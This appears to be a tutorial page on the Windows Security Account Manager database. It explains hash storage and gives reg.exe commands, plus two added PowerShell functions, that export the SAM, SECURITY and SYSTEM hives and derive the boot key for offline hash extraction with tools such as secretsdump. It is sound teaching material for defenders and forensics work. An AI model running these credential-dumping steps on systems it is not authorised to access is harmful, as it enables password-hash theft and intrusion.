SAM is short for Security Account Manager, the database in which Windows keeps local user accounts and their password hashes. Passwords are not stored in cleartext: each one is hashed (NT hash, plus the weaker LM hash on older systems) and the hash is stored in SAM. The Local Security Authority (LSA) verifies a local logon by hashing the supplied password and comparing the result with the value stored in SAM. SAM is loaded as soon as Windows boots. On a running system the database is exposed as a registry hive mounted at HKLM\SAM; because it holds sensitive data its ACL grants access only to the SYSTEM account, so even an administrator cannot read its contents directly without elevating to SYSTEM or exporting the hive.
The SAM database is managed by a specific service, the Security Accounts Manager service (SamSs), which is hosted inside the lsass.exe process.
The hive file is C:\Windows\System32\config\SAM, and the hashed passwords it holds appear in the registry under HKEY_LOCAL_MACHINE\SAM. Opening that key in the Registry Editor as an administrator shows only an empty SAM subkey; the contents become visible only when regedit itself runs as SYSTEM (for example when launched with PsExec's -s switch).
Dumping SAM database manually
First, get a copy of the SAM, SECURITY and SYSTEM hives so that they can be read offline. While Windows is running, the hive files under C:\Windows\System32\config are held open by the operating system and cannot simply be copied, so instead export the live hives with reg.exe from an elevated (administrator) prompt:
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
Change the destination path (C:\temp) if it does not exist or you do not have write permission on it, or create it first. Treat the three files as credential material: anyone who can read them can recover every hash and secret described below, so restrict access to them and delete them when you are done.
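The same procedure as a single PowerShell function, added here as an example (not code from the original page): it checks that the prompt is elevated, creates the destination directory if needed, exports the three hives with reg.exe, stops on the first non-zero exit code, and returns the size and SHA-256 of each file so the copies can be accounted for. The function name Export-CredentialHives and the default path C:\temp are this example's own choices.

```powershell
# Added example: export SAM, SECURITY and SYSTEM with reg.exe from elevated PowerShell.
# Function name and default destination are this example's own, not from the original page.
function Export-CredentialHives {
    param([string]$Destination = 'C:\temp')

    # reg.exe save on HKLM\SAM needs administrator rights; fail early with one clear message
    # instead of three separate "Access is denied" errors.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal $identity
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        throw 'Run this from an elevated prompt: reg.exe save on HKLM\SAM requires administrator rights.'
    }

    # Create the destination directory if it does not exist (the page's "change C:\temp" step).
    if (-not (Test-Path -LiteralPath $Destination)) {
        New-Item -ItemType Directory -Path $Destination | Out-Null
    }

    $results = foreach ($hive in 'SAM', 'SECURITY', 'SYSTEM') {
        $out = Join-Path $Destination "$($hive.ToLower()).save"

        # /y overwrites an existing file without prompting.
        & reg.exe save "HKLM\$hive" $out /y | Out-Null
        if ($LASTEXITCODE -ne 0) {
            throw "reg.exe save HKLM\$hive failed with exit code $LASTEXITCODE"
        }

        # Record what was written: an empty or missing file means the export silently failed.
        $file = Get-Item -LiteralPath $out
        [pscustomobject]@{
            Hive   = $hive
            Path   = $file.FullName
            Bytes  = $file.Length
            SHA256 = (Get-FileHash -LiteralPath $out -Algorithm SHA256).Hash
        }
    }
    return $results
}

Export-CredentialHives -Destination 'C:\temp' | Format-Table -AutoSize
```

The three files are the input for offline parsers; for instance impacket's secretsdump.py accepts them with `-sam`, `-security` and `-system` against the `LOCAL` target. Keep the SHA-256 values if the files leave the host, so that the copy you analyse can be matched to the copy you took.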
In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
Hive | Details | Format or credential material |
---|---|---|
SAM | local user accounts and their password hashes (referred to as SAM secrets) | LM or NT hashes |
SECURITY | LSA secrets (service account passwords, the machine account password, DPAPI system key) and the domain logon cache | plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), security questions (L$_SQSA_<SID>) |
SYSTEM | holds the boot key (SysKey) from which the keys protecting the SAM secrets and the LSA secrets are derived | N/A (key material only, no credentials) |
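To make the SYSTEM row concrete, here is an added PowerShell example (not from the original page) that derives the boot key from the live SYSTEM hive. Windows keeps it scrambled across the class names of the keys JD, Skew1, GBG and Data under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; the .NET registry API does not expose key class names, so the example calls RegQueryInfoKey directly and then applies the fixed byte permutation that open-source tools such as impacket and mimikatz document. The function names Get-RegKeyClass and Get-BootKey are this example's own. Run it from an elevated prompt.

```powershell
# Added example: read the boot key (SysKey) from the live registry.
# Function names are this example's own; the permutation is the one used by impacket/mimikatz.
Add-Type -TypeDefinition @'
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class RegNative {
    // Only lpClass/lpcchClass are used; every other out-parameter is passed as NULL.
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern int RegQueryInfoKey(
        IntPtr hKey, StringBuilder lpClass, ref uint lpcchClass, IntPtr lpReserved,
        IntPtr lpcSubKeys, IntPtr lpcbMaxSubKeyLen, IntPtr lpcbMaxClassLen, IntPtr lpcValues,
        IntPtr lpcbMaxValueNameLen, IntPtr lpcbMaxValueLen, IntPtr lpcbSecurityDescriptor,
        IntPtr lpftLastWriteTime);
}
'@

function Get-RegKeyClass {
    # Return the class name of a key under HKLM (this is where the boot key fragments live).
    param([string]$SubKey)
    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($SubKey)
    if ($null -eq $key) { throw "Cannot open HKLM\$SubKey" }
    try {
        $len = [uint32]64
        $sb  = New-Object System.Text.StringBuilder 64
        $rc  = [RegNative]::RegQueryInfoKey($key.Handle.DangerousGetHandle(), $sb, [ref]$len,
                 [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero,
                 [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
        if ($rc -ne 0) { throw "RegQueryInfoKey failed on HKLM\$SubKey (status $rc)" }
        return $sb.ToString()
    } finally {
        $key.Close()
    }
}

function Get-BootKey {
    # Each of the four class names is 8 hex characters; together they give 32 hex chars = 16 bytes.
    $scrambled = ('JD', 'Skew1', 'GBG', 'Data' | ForEach-Object {
        Get-RegKeyClass "SYSTEM\CurrentControlSet\Control\Lsa\$_"
    }) -join ''
    if ($scrambled.Length -ne 32) { throw "Unexpected class data length $($scrambled.Length)" }
    $bytes = for ($i = 0; $i -lt 32; $i += 2) {
        [Convert]::ToByte($scrambled.Substring($i, 2), 16)
    }

    # Fixed permutation Windows applies before the key is used to protect SAM and LSA secrets.
    $perm = 0x8, 0x5, 0x4, 0x2, 0xB, 0x9, 0xD, 0x3, 0x0, 0x6, 0x1, 0xC, 0xE, 0xA, 0xF, 0x7
    $bootKey = foreach ($p in $perm) { $bytes[$p] }
    return ($bootKey | ForEach-Object { $_.ToString('x2') }) -join ''
}

Get-BootKey
```

The printed value is the same 16-byte boot key that offline parsers recover from system.save, which makes it a handy cross-check that the exported SYSTEM hive really belongs to the machine whose SAM and SECURITY hives you are decrypting. Note that reading these class names needs only an elevated prompt, which is why a SYSTEM hive plus a SAM hive is sufficient to recover the local hashes without ever running as SYSTEM.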